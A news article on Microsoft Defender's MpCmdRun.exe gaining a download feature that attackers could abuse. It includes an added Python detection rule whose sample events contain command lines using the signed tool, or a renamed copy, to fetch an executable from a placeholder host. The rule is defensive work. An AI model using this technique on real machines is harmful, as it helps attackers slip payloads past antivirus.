September 21, 2020

Microsoft Defender can now be used to download malware and other files


Microsoft recently pushed an update to its Microsoft Defender antivirus software that adds a new feature: the ability to download resources from the Internet through the command line.

This has raised concern among security researchers, because attackers can also use this function to download malicious files, store them locally and launch attacks from the local machine.

Fortunately, even files downloaded through this feature are scanned by Microsoft Defender, so most malware should be blocked.

Since Microsoft scans the files its own tool downloads, why should security researchers worry about this new feature? In fact, the researchers' concern is not Microsoft Defender itself but third-party antivirus products.

The feature Microsoft added belongs to the Microsoft Defender command-line tool MpCmdRun.exe, which naturally also carries an official Microsoft signature.

Although Defender itself scans the files the command-line tool downloads, it is uncertain whether third-party antivirus software will also inspect files downloaded by a Microsoft tool.

When a user installs third-party antivirus software, Microsoft Defender is disabled, but the command-line tool can still be run and can still download files.

Since the tool is signed by Microsoft and runs from the command line, an attacker can execute it quietly in the background without showing the user any interface.

If the third-party antivirus software does not strictly inspect downloads, an attacker may be able to download malicious files and execute them through the command line.

Researchers recommend that third-party antivirus vendors update their security policies promptly, and that enterprise administrators use monitoring software to watch for use of the tool so that attackers cannot abuse it.
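The monitoring the researchers recommend can be expressed as a simple rule over process-creation telemetry. The following is an added example written for this article, not code from the article, from Microsoft or from any researcher it cites. It assumes process-creation events (Sysmon Event ID 1 or EDR telemetry) exported as dictionaries with `image`, `command_line` and `original_file_name` fields; those field names, the expected install paths for the genuine binary and all sample events are constructed for the example. The `-DownloadFile`, `-url` and `-path` switch names are those of the MpCmdRun.exe tool itself, not something the article spells out. The rule flags the download switch, a copy of the binary that has been renamed (recognised through the PE's OriginalFileName), an unexpected image path and an executable download destination, and it leaves routine signature updates and scans alone.

```python
"""Detect MpCmdRun.exe being used as a downloader in process-creation events.

Added example for this article; event layout, install paths and samples are
assumptions constructed here, not telemetry from a real system.
"""
import re

# Where the genuine Defender binary normally lives (assumption for this example).
EXPECTED_IMAGE_RE = re.compile(
    r"^c:\\(?:program files\\windows defender"
    r"|programdata\\microsoft\\windows defender\\platform\\[^\\]+)"
    r"\\mpcmdrun\.exe$"
)
DOWNLOAD_SWITCH_RE = re.compile(r"(?<![\w-])-downloadfile\b", re.IGNORECASE)
URL_RE = re.compile(r"-url\s+(\S+)", re.IGNORECASE)
PATH_RE = re.compile(r'-path\s+("[^"]+"|\S+)', re.IGNORECASE)
EXECUTABLE_EXT = (".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta", ".scr")


def _basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Return a finding dict for a suspicious MpCmdRun.exe event, else None."""
    image = event.get("image", "")
    cmd = event.get("command_line", "")
    original = event.get("original_file_name", "")

    # Match on the on-disk name OR the PE's OriginalFileName, so a copied and
    # renamed MpCmdRun.exe is still recognised as the Defender tool.
    if _basename(image) != "mpcmdrun.exe" and original.lower() != "mpcmdrun.exe":
        return None

    reasons = []
    if DOWNLOAD_SWITCH_RE.search(cmd):
        reasons.append("download switch used")
    if _basename(image) != "mpcmdrun.exe":
        reasons.append("binary renamed")
    if not EXPECTED_IMAGE_RE.match(image.lower()):
        reasons.append("unexpected image path")

    url = URL_RE.search(cmd)
    dest = PATH_RE.search(cmd)
    dest_path = dest.group(1).strip('"') if dest else None
    if dest_path and dest_path.lower().endswith(EXECUTABLE_EXT):
        reasons.append("executable destination")

    if not reasons:
        return None  # routine use: signature updates, scans, etc.

    return {
        "severity": "high" if len(reasons) > 1 else "medium",
        "reasons": reasons,
        "url": url.group(1) if url else None,
        "dest": dest_path,
    }


def scan(events):
    """Run the rule over a batch of events; returns (index, finding) pairs."""
    results = []
    for i, ev in enumerate(events):
        finding = analyze_event(ev)
        if finding:
            results.append((i, finding))
    return results


# Constructed sample events (not real telemetry). The platform version folder
# and the host names are placeholders.
SAMPLE_EVENTS = [
    {   # routine signature update from the expected path
        "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
        "original_file_name": "MpCmdRun.exe",
        "command_line": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -SignatureUpdate',
    },
    {   # genuine binary, but used to fetch an executable
        "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
        "original_file_name": "MpCmdRun.exe",
        "command_line": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -DownloadFile '
                        r"-url https://files.example.invalid/update.exe -path C:\Users\Public\update.exe",
    },
    {   # copied and renamed binary used as a downloader
        "image": r"C:\Users\Public\mp.exe",
        "original_file_name": "MpCmdRun.exe",
        "command_line": r"mp.exe -DownloadFile -url https://files.example.invalid/notes.txt "
                        r"-path C:\Users\Public\notes.txt",
    },
    {   # unrelated process
        "image": r"C:\Windows\System32\cmd.exe",
        "original_file_name": "Cmd.Exe",
        "command_line": "cmd.exe /c whoami",
    },
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(idx, finding)
```

The OriginalFileName check is the part most worth keeping: a rule keyed only on the file name `MpCmdRun.exe` is defeated by copying the signed binary elsewhere under another name, while the PE version resource survives the copy. In a real deployment the expected-path regex should be derived from the paths Defender actually uses on the estate, and a medium-severity hit from the genuine path would typically be cross-checked against change tickets before being escalated.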

Microsoft has not released a detailed explanation, and the company did not say why it added download functionality to the tool.

Via: bleepingcomputer